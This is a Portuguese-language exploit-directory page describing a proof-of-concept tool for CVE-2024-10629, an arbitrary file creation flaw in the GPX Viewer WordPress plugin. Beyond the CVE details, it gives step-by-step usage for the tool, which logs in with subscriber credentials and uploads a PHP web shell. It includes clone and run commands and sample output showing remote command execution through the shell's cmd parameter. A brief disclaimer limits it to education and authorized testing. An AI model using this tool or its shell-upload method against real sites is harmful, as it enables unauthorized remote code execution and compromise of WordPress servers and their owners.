Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/nxploited/cve-2024-10629
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2024-10629

CVE-2024-10629

GPX Viewer <= 2.2.8 - Autenticado (Assinante+) Criação Arbitrária de Arquivos

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛠️ Exploit GPX Viewer (CVE-2024-10629)

Este repositório contém uma prova de conceito de exploit para o plugin GPX Viewer para WordPress, que é vulnerável à criação arbitrária de arquivos (CVE-2024-10629). A vulnerabilidade permite que atacantes autenticados com acesso de nível de assinante e superior criem arquivos arbitrários no servidor do site afetado, potencialmente levando à execução remota de código.

📝 Detalhes do CVE

  • ID do CVE: CVE-2024-10629
  • Publicado em: 2024-11-13
  • Atualizado em: 2024-11-13
  • Plugin Vulnerável: GPX Viewer <= 2.2.8
  • Tipo de Vulnerabilidade: Criação Arbitrária de Arquivos Autenticada (Assinante+)
  • Pontuação: 8.8 ALTA
  • Severidade: ALTA
  • Versão: 3.1
  • String do Vetor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Descrição

O plugin GPX Viewer para WordPress é vulnerável à criação arbitrária de arquivos devido à falta de verificação de capacidade e validação de tipo de arquivo na função gpxv_file_upload() em todas as versões até, e incluindo, 2.2.8. Isso possibilita que atacantes autenticados, com acesso de nível de assinante e superior, criem arquivos arbitrários no servidor do site afetado, o que pode tornar possível a execução remota de código.

🚀 Funcionalidades

  • Login automático usando nome de usuário e senha fornecidos.
  • Verificação da versão do plugin GPX Viewer.
  • Upload de um shell PHP para o servidor.
  • Verificação do upload bem-sucedido do shell.
  • Execução de comandos no servidor através do shell enviado.

📚 Uso

Pré-requisitos

  • Python 3.x
  • Biblioteca requests

Executando o Exploit

  1. Clone o repositório:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-10629/
    cd CVE-2024-10629
    
  2. Instale a biblioteca necessária:

    root@kitploit:~
    pip install requests
    
  3. Execute o exploit:

    root@kitploit:~
    python exploit.py -u <target_url> -un <username> -p <password>
    

    Substitua <target_url>, <username> e <password> pelos valores apropriados.

Exemplo

root@kitploit:~
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password

Saída

O script exibirá a versão do plugin e verificará se ele é vulnerável. Em seguida, fará login usando as credenciais fornecidas e tentará fazer o upload do shell. Se bem-sucedido, verificará o upload do shell e executará um comando de exemplo (ls).

root@kitploit:~
[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...

Comandos de Exemplo

  • ls = Mostrar arquivos
  • uname -a = Mostrar informações do sistema

⚠️ Aviso Legal

Este exploit é destinado apenas para fins educacionais e testes autorizados. O uso não autorizado deste exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal e antiético. Os autores e colaboradores deste repositório não são responsáveis por qualquer uso indevido ou dano causado por este exploit.


Por: Khaled Alenazi (Nxploit)

Baixar ferramenta